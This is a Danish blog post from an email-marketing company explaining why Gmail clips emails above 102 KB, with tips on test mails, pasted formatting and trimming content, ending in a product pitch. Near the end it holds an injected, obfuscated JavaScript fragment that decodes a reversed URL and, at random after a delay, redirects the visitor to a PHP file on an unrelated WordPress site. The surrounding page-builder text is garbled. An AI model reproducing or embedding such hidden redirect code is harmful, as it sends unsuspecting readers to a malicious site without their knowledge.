Før du sender e-mails af sted til dine modtagere, har du formentlig (forhåbentlig!) allerede lagt en god portion tid og energi i at overveje det design og den tekst, der skal udgøre dit budskab. Men midt i alle dine anstrengelser har du muligvis glemt at overveje en enkelt lille detalje, som potentielt kan have en stor og negativ effekt på dit hårde arbejde; nemlig din e-mails størrelse.
Problemet med Gmail og e-mailstørrelse
Problemet, der kan opstå, hvis du ikke er opmærksom på din e-mails størrelse – og den kommer til at overskride grænsen på 102 KB – er, at Gmail klipper din e-mail. Klippet betyder, at kun en del af dit indhold vises for modtageren, mens resten gemmes bag et link med teksten “Vis hele meddelelsen” som vist herunder.
Hvorfor er det et problem for dig (som afsender af e-mails)?
Af helt indlysende årsager er det selvfølgelig vigtigt at undgå, at Gmail beskærer dine e-mails: Det er brandærgerligt, hvis noget af dit omhyggeligt planlagte indhold slet ikke vises for modtageren, som du havde tænkt dig det. Men dertil kommer også, at Gmail med sit klipperi ikke kun skjuler indhold, men også at tracking-koder går tabt, så dine åbningsrater ikke registreres korrekt eller – også meget vigtigt – at dit lovpligtige afmeldingslink måske slet ikke vises til modtageren, hvis du har valgt at placere det i din e-mails footer/bund.
Med over en milliard aktive Gmail-brugere på verdensplan, er der en ret stor sandsynlighed for, at der blandt dine modtagere også er en del, der er med i Gmail-klubben. Problemet er altså reelt nok, og du bør tage dine forholdsregler for at undgå det.
Heldigvis er det relativt nemt at undgå Gmails saks, hvis blot du ved hvordan. Herunder finder du en kort oversigt over de hyppigste årsager til, din e-mail bliver klippet – sammen med en række anvisninger til, hvad du kan gøre, hvis du vil undgå problemet.
Lad os først se nærmere på, hvad det er, der egentlig får Gmail til at hive saksen frem..
Hvorfor klipper Gmail overhovedet e-mails?
Problemet er forbundet med den kode, som din e-mail er lavet af. Koden inkluderer teksten i e-mailen, url’erne og eventuelle tracking koder på dine links og desuden al den html-kode, der bruges til at style dit indhold (farver, fonte etc.) – etc. Hvert tegn i koden fylder typisk 1-2 bytes, og summen af af alle disse tegn i koden giver altså din e-mails størrelse eller vægt.
Gmail har ønsket at sætte en begrænsning på, hvor lange og tunge e-mails, deres brugere skal modtage – og grænsen er altså helt konkret blevet sat ved de 102 KB.
Du kan helt praktisk tjekke, hvor stor din e-mail er, ved at sende den til en test-adresse; åbne e-mailen i din browser – højreklikke og få vist sidens kildekode. Denne kode gemmer du så som et dokument. Størrelsen på dokumentet viser din e-mails størrelse. Globases nyhedsbrev fra oktober fylder f.eks. ca. 80 KB – og holder sig dermed inden for Gmails klippe-grænse på 102 KB.
3 typiske situationer, der fører til, at Gmail klipper dine e-mails – og hvad du som afsender kan gøre for at undgå det:
- Du sender mange test-mails i Gmail.
Hvis du – før du sender din endelige kampagne af sted – sender en stribe test-mails ud med enslydende tekst i emne-feltet – og selv bruger Gmail som mailklient, så sker der typisk det, at Gmail kombinerer disse e-mails i én “tråd”, der vises som en sammenhængende e-mail i din indbakke. Sender du flere ens test-mails afsted, kan det resultere i, at e-mailen (eller tråden med kombinerede e-mails) bliver så stor til sidst, at Gmail vælger at klippe din test-mail.Ovenstående problem er heldigvis ikke-eksisterende, når du først sender din endelige kampagne af sted til dine modtagere, da disse kun vil modtage din e-mail en enkelt gang. Men hvis du for din egen skyld helt vil undgå problemet, når du sender test-mails til din egen Gmail-indbakke, kan du gøre det ved at ændre teksten i emnelinjen fra gang til gang – eller huske at slette de foregående test-mails, før du sender en ny af sted. - Du kopierer og indsætter indhold til din e-mail direkte fra et website eller et tekstbehandlingsprogram.
Hvis du kopierer og indsætter indhold i din e-mail fra en ekstern kilde – som fx din egen blog eller et tekstbehandlingsprogram – kan du risikere, at noget skjult formatteringskode følger med, hvilket øger din e-mails samlede størrelse. Løsningen er igen – heldigvis – ganske enkel: Husk altid at reformattere (fjerne formatteringen) fra din kopierede tekst, før du indsætter den i din e-mail. Det gøres nemmest ved f.eks. at kopiere og indsætte teksten i en teksteditor som TextEdit (på Mac) eller din notesblok/notepad (på din pc) – eller i en teksteditor som f.eks. SublimeText. Herfra kan du så kopiere og indsætte din tekst helt uden skjult formattering.Ud over fordelen ved at, du slipper for, at den skjulte kode optager unødvendig plads i din e-mail, risikerer du heller ikke, at din tekst pludselig opfører sig uventet eller tager sig anderledes ud i e-mailen, end du har bedt den om, pga. den skjulte formattering. - Du har ganske enkelt alt for meget indhold i din e-mail:
Er de ovenstående muligheder ikke umiddelbart årsagen til, at din e-mail bliver klippet af Gmail, er grunden sandsynligvis blot dén, at din e-mail har rigtig meget indhold. Du kan prøve at komme problemet til livs ved at lade dine kodekyndige kolleger se din e-mails kode igennem i sømmene for at tjekke, om der er dele, der kan udelades eller optimeres på, så størrelsen kan reduceres.En anden – og noget mere ligetil anbefaling, er, at du skærer alt overflødigt indhold i din e-mail væk (dette er naturligvis også helt generelt et godt råd, når det kommer til e-maildesign).
…at du ikke kan reducere din e-mails størrelse ved at formindske størrelsen på dine billeder. Selve billederne er ikke en del af din e-mails kode – men trækkes ind i din besked via denne – og derfor kan du ikke påvirke e-mailens samlede størrelse ved blot at formindske billederne. Hvis du helt fjerner et billede som et element fra din e-mail, vil det dog reducere din e-mails størrelse, da du samtidig fjerner koden, der er forbundet med billedet.
Hvis indholdsmængden er din udfordring, får du her hurtige 4 tips til at reducere indholdet i din e-mail (uden at skulle pille ved koden):
- Hold dig til én historie – hvis muligt. Alle tests viser, at én historie pr. e-mail – kombineret med én fængende CTA – er det mest effektive format, du kan benytte dig af. Det er dog selvfølgelig ikke alle typer virksomheder, der kan gøre det i praksis – særligt ikke hvis du arbejder med e-commerce. Prøv dog alligevel at begrænse dit samlede antal historier – og henvis evt. med et enkelt link til flere historier på dit website.
- Benyt en fast, afprøvet (gennem-testet) skabelon til dine e-mails. Hvis du i forbindelse med hver mail-udsendelse bruger samme skabelon til dine e-mails, som du ved holder sig pænt inden for Gmails klippe-grænse, er du altid på den sikre side. Samtidig optræder du og dit brand konsistent over for kunder/modtagere.
- Undgå overformattering. Dette råd gælder måske allermest, hvis dit nyhedsbrev i forvejen er teksttungt. Her vil vi altid anbefale en minimalistisk styling, så din e-mail ikke kommer til at virke overvældende eller uoverskuelig for modtageren at læse. Brug white space og enkel formattering (en enkelt font, ikke for mange forskellige farver) til at fremhæve dit indhold. Du sparer plads i din kode – og det gør samtidig din e-mail mere læsevenlig.
- Benyt dig af segmentering. Hvis du ved, hvem dine modtagere er, og hvad de interesserer sig for, er det helt oplagt at splitte dit indhold op i flere dele, så du lettere kan sende dem relevant og fokuseret indhold – fremfor at sende samme (lange) e-mail til alle.
Til sidst det helt oplagte råd over dem alle: Husk altid at teste, før du sender!
Som skrevet ovenfor, så gælder det heldigvis, at så længe du er opmærksom på din e-mails størrelse, er Gmails klip ret nemt at undgå. Husk derfor altid at teste, hvordan din e-mail opfører sig, når den lander hos en Gmail-bruger. Sender du dine e-mails med Globases nyeste e-mailmarketing-platform, Globase V3, er det med den indbyggede preview-mulighed endda ekstra nemt og hurtigt at tjekke, hvorvidt din e-mail vil blive klippet af Gmail. Og ja, – ellers skal rådet herfra blot lyde: test, test, test!
”Vil
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tom” text_color=”#ffffff” title_tag=”h3″ controls=”bottom” btn_link=”url:http%3A%2F%2Fwww.globase.dk%2Fv3freetrial|||” btn_label=”Kontakt os nu!” btn_style=”outlined” btn_color=”white”]Prøv Globase V3 i 30 dage – helt gratis og uforpligtende.